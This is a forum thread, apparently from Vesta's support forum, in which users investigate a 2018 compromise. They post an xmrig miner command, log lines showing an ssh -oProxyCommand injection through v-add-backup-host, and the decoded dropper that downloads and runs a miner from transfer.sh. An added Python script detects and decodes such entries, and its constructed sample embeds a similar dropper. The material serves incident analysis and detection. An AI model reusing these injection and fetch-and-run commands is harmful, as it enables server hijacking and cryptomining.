We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED! by xaxaxa.eu
Re: have been HACKED! by xaxaxa.eu
cybersa wrote (Mon Jul 02, 2018 10:26 am):
My website was hacked on Jun 22 around 11:10 PM UTC. My server got upgraded to the latest version automatically, but I think the server was infected before that.
I have removed the miner file under /tmp/xmrig. Then I analyzed the server log to find the root cause and found the following:
1. No new user (sysroot) has been created as mentioned in the first post's script.
2. No new cron jobs have been added.
3. xmrig was run with this command:

./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background

4. Found this log in /var/log/vesta/error.log:

2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]

Decoded version:

cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null

My OS: Ubuntu 16
FYI @ScIT
No new user, but I also found errors in /var/log/vesta/error.log, with log entries showing it ran once after upgrading to version 22 as well.
2018-07-12 22:48:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

2018-07-13 07:39:36 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

2018-07-22 17:02:00 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
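As an added example (not code from the thread or from the Vesta project), this Python script scans /var/log/vesta/error.log lines for the v-add-backup-host entries with a smuggled -oProxyCommand shown above, decodes the embedded base64 for inspection without executing it, and lists miner-related indicators in the decoded text. The sample log and the hostnames in it are constructed, not taken from the real incident.

```python
import base64
import binascii
import re
from typing import List, Optional

# Shape of the /var/log/vesta/error.log entries quoted in the thread:
#   <date> <time> v-add-backup-host 'sftp' '<host>' '"-oProxyCommand=echo <b64>|base64 -d|sh" x' '******' [Error 15]
LOG_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) v-add-backup-host (?P<args>.*)$")
# The injection: an ssh ProxyCommand option smuggled in through the backup host argument.
PROXY_RE = re.compile(r"-oProxyCommand=echo\s+(?P<b64>[A-Za-z0-9+/=]+)\s*\|\s*base64 -d\s*\|\s*sh")
# Substrings typical of the decoded miner dropper; used only to rank findings, never executed.
INDICATORS = ("xmrig", "xmr-stak", "wget ", "curl ", "chmod +x", "/tmp", "pkill", "--donate-level")

def decode_payload(b64: str) -> str:
    """Decode the smuggled base64 for analysis; return '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""

def scan_line(line: str) -> Optional[dict]:
    """Return a finding for a v-add-backup-host entry carrying a ProxyCommand payload, else None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    p = PROXY_RE.search(m.group("args"))
    if not p:
        return None
    payload = decode_payload(p.group("b64"))
    return {
        "ts": m.group("ts"),
        "payload": payload,
        "indicators": [i for i in INDICATORS if i in payload],
    }

def scan_log(text: str) -> List[dict]:
    """Scan a whole error.log body and return findings in file order."""
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]

# Constructed sample log (hypothetical, not the thread's real blob): the first entry mimics
# the injected ProxyCommand, the other two are ordinary failures that must not be flagged.
_DROPPER = "cd /tmp;pkill xmrig;wget -qO xmrig https://dropper.example.invalid/xmrig&&chmod +x xmrig&&./xmrig --donate-level=1 --background"
_B64 = base64.b64encode(_DROPPER.encode()).decode()
SAMPLE_LOG = (
    f"2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '\"-oProxyCommand=echo {_B64}|base64 -d|sh\" x' '******' [Error 15]\n"
    "2018-06-23 01:00:00 v-add-backup-host 'sftp' 'backup.example.invalid' 'vesta' '******' [Error 15]\n"
    "2018-06-23 02:00:00 v-add-user 'bob' '******' 'bob@example.invalid' [Error 4]\n"
)
```

Run scan_log over the real file and any finding is worth treating as a compromise indicator: the host argument of a legitimate v-add-backup-host call never contains an ssh option.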